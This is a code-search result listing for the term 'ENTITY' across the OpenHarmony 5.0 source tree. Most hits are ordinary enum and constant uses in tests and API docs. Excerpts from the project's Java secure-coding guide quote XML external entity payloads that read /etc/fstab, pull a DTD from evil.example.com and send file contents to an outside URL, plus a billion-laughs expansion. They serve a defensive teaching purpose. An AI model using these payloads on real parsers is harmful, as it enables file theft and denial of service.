/ohos5.0/foundation/distributeddatamgr/udmf/framework/innerkitsimpl/test/unittest/ |
H A D | file_test.cpp | 64 UDType type = UDType::ENTITY; 80 UDType type = UDType::ENTITY;
|
H A D | application_defined_record_test.cpp | 92 UDType type = UDType::ENTITY; 107 UDType type = UDType::ENTITY;
|
H A D | system_defined_pixelmap_test.cpp | 77 UDType type = UDType::ENTITY; 93 UDType type = UDType::ENTITY;
|
H A D | audio_test.cpp | 62 UDType type = UDType::ENTITY;
|
H A D | folder_test.cpp | 62 UDType type = UDType::ENTITY;
|
H A D | image_test.cpp | 62 UDType type = UDType::ENTITY;
|
H A D | system_defined_form_test.cpp | 62 UDType type = UDType::ENTITY;
|
H A D | html_test.cpp | 131 UDType type = UDType::ENTITY;
|
H A D | link_test.cpp | 63 UDType type = UDType::ENTITY;
|
/ohos5.0/docs/zh-cn/contribute/ |
H A D | OpenHarmony-Java-secure-coding-guide.md | 1497 <!ENTITY file SYSTEM "file:///c:/xxx/xxx.ini"> ]> 1512 <!ENTITY % start "<![CDATA["> 1513 <!ENTITY % goodies SYSTEM "file:///etc/fstab"> 1514 <!ENTITY % end "]]>"> 1515 <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd"> 1525 <!ENTITY all "%start;%goodies;%end;"> 1532 <!ENTITY % send "<!ENTITY all SYSTEM 'http://mywebsite.com/?%gooddies;'>"> 1648 <!ENTITY lol "lol"> 1649 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 1650 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> [all …]
|
/ohos5.0/base/notification/common_event_service/services/test/unittest/ |
H A D | common_event_unsubscribe_unit_test.cpp | 36 const std::string ENTITY = "com.ces.test.entity"; variable 169 matchingSkills.AddEntity(ENTITY);
|
H A D | common_event_dump_test.cpp | 36 const std::string ENTITY = "com.ces.test.entity"; variable 476 want.AddEntity(ENTITY); in SetPublishDataByOrdered() 500 want.AddEntity(ENTITY); in SetPublishDataByOrdered2() 524 want.AddEntity(ENTITY); in SetPublishDataByUnordered() 549 matchingSkills.AddEntity(ENTITY); in SubscribeDoubleEvent() 572 want.AddEntity(ENTITY); in PublishUnorderedEvent() 607 want.AddEntity(ENTITY); in PublishStickyEvent() 641 want.AddEntity(ENTITY); in PublishStickyEvent() 1166 matchingSkills.AddEntity(ENTITY); 1220 matchingSkills.AddEntity(ENTITY);
|
H A D | common_event_subscribe_unit_test.cpp | 43 const std::string ENTITY = "com.ces.test.entity"; variable 843 matchingSkills.AddEvent(ENTITY);
|
/ohos5.0/docs/zh-cn/application-dev/reference/apis-arkdata/ |
H A D | udmf__meta_8h.md | 93 …_META_GENERAL_FILE](_u_d_m_f.md#udmf_meta_general_file) "general.file" | 所有文件的基类型,归属类型为ENTITY。 | 94 …F_META_DIRECTORY](_u_d_m_f.md#udmf_meta_directory) "general.directory" | 所有目录的基类型,归属类型为ENTITY。 | 96 | [UDMF_META_SYMLINK](_u_d_m_f.md#udmf_meta_symlink) "general.symlink" | 所有符号链接的基类型,归属类型为ENTITY。 …
|
H A D | js-apis-data-uniformTypeDescriptor.md | 24 | ENTITY<sup>11+</sup> | 'general.entity' | 所有表示物理存储类型的基类型,… 131 | FILE | 'general.file' | 所有文件的基类型,归属类型为ENTITY。<br>**原子化服务API… 132 | DIRECTORY<sup>11+</sup> | 'general.directory' | 所有目录的基类型,归属类型为ENTITY。 … 134 | SYMLINK<sup>11+</sup> | 'general.symlink' | 所有符号链接的基类型,归属类型为ENTITY。 …
|
H A D | _u_d_m_f.md | 99 | [UDMF_META_GENERAL_FILE](#udmf_meta_general_file) "general.file" | 所有文件的基类型,归属类型为ENTITY。 | 100 | [UDMF_META_DIRECTORY](#udmf_meta_directory) "general.directory" | 所有目录的基类型,归属类型为ENTITY。 | 102 | [UDMF_META_SYMLINK](#udmf_meta_symlink) "general.symlink" | 所有符号链接的基类型,归属类型为ENTITY。 | 661 所有目录的基类型,归属类型为ENTITY。 843 所有文件的基类型,归属类型为ENTITY。 1805 所有符号链接的基类型,归属类型为ENTITY。
|
/ohos5.0/foundation/distributeddatamgr/udmf/framework/innerkitsimpl/common/ |
H A D | unified_meta.cpp | 25 { ENTITY, "ENTITY", "general.entity" }, 552 return value >= ENTITY && value < UD_BUTT; in IsValidType()
|
/ohos5.0/docs/en/contribute/ |
H A D | OpenHarmony-Java-secure-coding-guide.md | 1489 <!ENTITY file SYSTEM "file:///c:/xxx/xxx.ini"> ]> 1504 <!ENTITY % start "<![CDATA["> 1505 <!ENTITY % goodies SYSTEM "file:///etc/fstab"> 1506 <!ENTITY % end "]]>"> 1507 <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd"> 1517 <!ENTITY all "%start;%goodies;%end;"> 1524 <!ENTITY % send "<!ENTITY all SYSTEM 'http://mywebsite.com/?%gooddies;'>"> 1640 <!ENTITY lol "lol"> 1641 <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> 1642 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> [all …]
|
/ohos5.0/foundation/distributeddatamgr/udmf/framework/common/ |
H A D | udmf_types_util.cpp | 169 if (type < ENTITY || type >= UD_BUTT) { in Unmarshalling()
|
/ohos5.0/base/global/system_resources/ |
H A D | LICENSE_Fonts | 8 …LEGAL AGREEMENT BETWEEN YOU (EITHER A SINGLE INDIVIDUAL, OR SINGLE LEGAL ENTITY) AND HUAWEI DEVICE…
|
/ohos5.0/base/update/updater/resources/font/ |
H A D | LICENSE_Fonts | 8 …LEGAL AGREEMENT BETWEEN YOU (EITHER A SINGLE INDIVIDUAL, OR SINGLE LEGAL ENTITY) AND HUAWEI DEVICE…
|
/ohos5.0/docs/en/application-dev/reference/apis-arkdata/ |
H A D | udmf__meta_8h.md | 93 …udmf_meta_general_file) "general.file" | Generic file type.<br>This type belongs to **ENTITY**.| 94 …ta_directory) "general.directory" | Generic directory type.<br>This type belongs to **ENTITY**.| 96 …mf_meta_symlink) "general.symlink" | Generic symbolic type.<br>This type belongs to **ENTITY**.|
|
H A D | js-apis-data-uniformTypeDescriptor.md | 24 | ENTITY<sup>11+</sup> | 'general.entity' | Generic physica… 131 …ral.file' | Generic file type.<br>This type belongs to **ENTITY**.<br>**Atomic ser… 132 …ctory' | Generic directory type.<br>This type belongs to **ENTITY**. … 134 …ral.symlink' | Generic symbolic type.<br>This type belongs to **ENTITY**. …
|
/ohos5.0/foundation/distributeddatamgr/udmf/interfaces/innerkits/common/ |
H A D | unified_meta.h | 69 ENTITY = 0, enumerator
|
/ohos5.0/foundation/bundlemanager/bundle_framework/services/bundlemgr/test/unittest/bms_bundle_kit_service_base_test/ |
H A D | bms_bundle_kit_service_base_test.cpp | 54 const std::string ENTITY = "entity.system.home"; variable 171 skill.entities = {ENTITY}; in MockInstallBundle()
|